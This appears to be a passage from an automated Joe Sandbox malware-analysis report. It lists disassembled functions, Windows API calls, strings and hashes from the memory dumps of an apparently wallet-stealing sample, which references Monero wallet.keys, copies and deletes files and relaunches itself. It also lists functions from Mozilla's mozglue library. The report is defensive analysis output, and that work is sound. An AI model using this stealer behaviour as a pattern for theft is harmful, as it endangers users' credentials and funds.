Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 59f72a540957d37375fe3ba48afe7092c64e1bedea4cbd526e1645ce1d1117fc
Instruction ID: bcd9026a6b47b88b71a4478db573f23ea3010b2f20259d4e2ef9df0d293d680b
Opcode Fuzzy Hash: 59f72a540957d37375fe3ba48afe7092c64e1bedea4cbd526e1645ce1d1117fc
Instruction Fuzzy Hash: 9401DA75540148FFCB04DFECD988EAE7BB9EF58354F108148F9099B204CA31AA50DBA1

Function 6C690D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C653DEF), ref: 6C690D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C653DEF), ref: 6C690D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C653DEF), ref: 6C690DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C690D97, 6C690DBE
<jemalloc>, xrefs: 6C690D92, 6C690DB9

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction ID: 9eb333f3b368d62e8b1546ca32396374ec09f74a64d74f8d664fc73b983ace28
Opcode Fuzzy Hash: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction Fuzzy Hash: C2F02E3138039623E72016670C0AF6A269EA7C6B35F314035F744DE9C4DA90F80486AE

Function 6C67D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751

Strings

MOZ_CRASH(), xrefs: 6C67D4BB

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction ID: 72be7f876658cff6d62bdf5daf5ff4cfa071adc8b61d5b6b6fcdee3ae64f8576
Opcode Fuzzy Hash: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction Fuzzy Hash: E651A071A047018FD364CF29C49465AB7F1EF89704F558E2ED59AC7B84D770E840CB6A

Function 6C6AB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C654290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C693EBD,6C693EBD,00000000), ref: 6C6542A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6AB127), ref: 6C6AB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6AB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6AB4E4

Strings

pid:, xrefs: 6C6AB4DE

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction ID: 08c90ab0690d7f8403227b0f2834ab55f99ceeb46082f2b9e9c56eb2096e64bc
Opcode Fuzzy Hash: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction Fuzzy Hash: E431E031A0120C9FDB00DFEAD880AEEB7B5FF85318F540529D81267A45D732AD46CBA9

Function 000B6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 000B6663

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

ShellExecuteEx.SHELL32(0000003C), ref: 000B6726
ExitProcess.KERNEL32 ref: 000B6755

Strings

<, xrefs: 000B66D9

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 28a5b415a3c1cdb575cce94e49599c107ee3125b0b5b3fb15e076f70fc9a1b7a
Instruction ID: 71f79749a3940c82c454dfe174e63324567877767e333a46594406f00edf6db5
Opcode Fuzzy Hash: 28a5b415a3c1cdb575cce94e49599c107ee3125b0b5b3fb15e076f70fc9a1b7a
Instruction Fuzzy Hash: 2E310CB1D01218ABDB14EB90DC96FDEB77CAF44300F804199F20A66192DF746B49CF66

Function 000B87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000C0E28,00000000,?), ref: 000B882F
RtlAllocateHeap.NTDLL(00000000), ref: 000B8836
wsprintfA.USER32 ref: 000B8850

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Strings

%dx%d, xrefs: 000B8847

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 699ed49cfb9d89a5949766619ada8a6ee65c95f4be58e9e5953a91298cd6eacf
Instruction ID: f31451dd0fed7a60b7062f259ff217a797b7fee2cf0c3f731491f356bc414f15
Opcode Fuzzy Hash: 699ed49cfb9d89a5949766619ada8a6ee65c95f4be58e9e5953a91298cd6eacf
Instruction Fuzzy Hash: E92103B1A44244AFDB04DF94DD89FAEBBB8FB49711F104119F605AB290C7796901CBA1

Function 6C69E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C69E577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E584
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C69E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C69E826, 6C69E850
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C69E722, 6C69E750, 6C69E7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C69E655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C69E777
MOZ_PROFILER_STARTUP, xrefs: 6C69E5A1, 6C69E5CC, 6C69E5FF, 6C69E62A

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction ID: 8c3d27a3f7cef48c4ed5c2157a3c3fed9863bba23175123dc71420e2c82529b7
Opcode Fuzzy Hash: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction Fuzzy Hash: 4111AD31A04258DFCB009F16C888B6ABBB4FFC9329F050A19E84587651D774B805CFDE

Function 000B8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000B951E,00000000), ref: 000B8D5B
RtlAllocateHeap.NTDLL(00000000), ref: 000B8D62
wsprintfW.USER32 ref: 000B8D78

Strings

%hs, xrefs: 000B8D6F

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 1acf3cff65143a6ef36dc380897c03c2ea942b80ce0971a23c9801c39e83fb13
Instruction ID: e79196e96f9f569d3df90e982037334b9c5aafaf05195029cc6e42709176fbff
Opcode Fuzzy Hash: 1acf3cff65143a6ef36dc380897c03c2ea942b80ce0971a23c9801c39e83fb13
Instruction Fuzzy Hash: 1CE0E675A80208FBD710DB94ED4DE5D7BB8EB44701F044155FD099B280D9716E149B56

Function 6C6A0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0CD5

Part of subcall function 6C68F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C68F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0D40
free.MOZGLUE ref: 6C6A0DCB

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

free.MOZGLUE ref: 6C6A0DDD
free.MOZGLUE ref: 6C6A0DF2

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction ID: 0744bd5b5f7c2c126cec454ca987b28fa44c9ec751ffde8c5b25c6819782081d
Opcode Fuzzy Hash: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction Fuzzy Hash: 154139719087809BD320DF29C08079AFBE5BFC9714F118A2EE9D987750D770A846CB9B

Function 6C6ACCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDA4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD158
Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDC4

Part of subcall function 6C6A7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6B15FC,?,?,?,?,6C6B15FC,?), ref: 6C6A74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACECC

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

Part of subcall function 6C69CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6ACEEA,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000), ref: 6C69CB57
Part of subcall function 6C69CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C69CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6ACEEA,?,?), ref: 6C69CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD058

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction ID: 7f1d13926e85e4132c53c4f335a1232c33e1e35778ffcb01c90bc5c865becd05
Opcode Fuzzy Hash: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction Fuzzy Hash: 2FD16F71A04B469FD708CF28C480B99F7E1BF89308F01866DD95987712EB31B9A6CBC5

Function 000AD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000B8B60: GetSystemTime.KERNEL32(000C0E1A,01399EE8,000C05AE,?,?,000A13F9,?,0000001A,000C0E1A,00000000,?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000B8B86

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000AD481
lstrlen.KERNEL32(00000000), ref: 000AD698
lstrlen.KERNEL32(00000000), ref: 000AD6AC
DeleteFileA.KERNEL32(00000000), ref: 000AD72B

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
